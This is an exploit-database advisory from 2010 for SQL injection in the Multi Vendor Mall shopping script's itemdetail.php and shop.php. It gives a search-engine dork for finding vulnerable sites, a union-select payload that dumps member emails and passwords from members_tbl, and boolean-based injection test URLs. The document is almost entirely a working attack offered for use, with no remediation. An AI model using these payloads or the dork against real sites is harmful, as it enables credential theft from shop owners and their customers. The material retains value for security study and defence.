[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability
# Published : 2010-05-26
# Author : CoBRa_21
# Previous Title : Easy Address book Webserver 1.2 CSRF
# Next Title : Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability


-------------------------------------------------------------------------------------------

Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Script Home: http://www.multishopcms.com

Dork: pages.php?id= "Multi Vendor Mall"

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/itemdetail.php?itemid=-39 union select 0,1,2,3,4,5,group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+members_tbl--


http://localhost/[path]/shop.php?storeid=77 and 1=2
http://localhost/[path]/shop.php?storeid=77 and 1=1
-------------------------------------------------------------------------------------------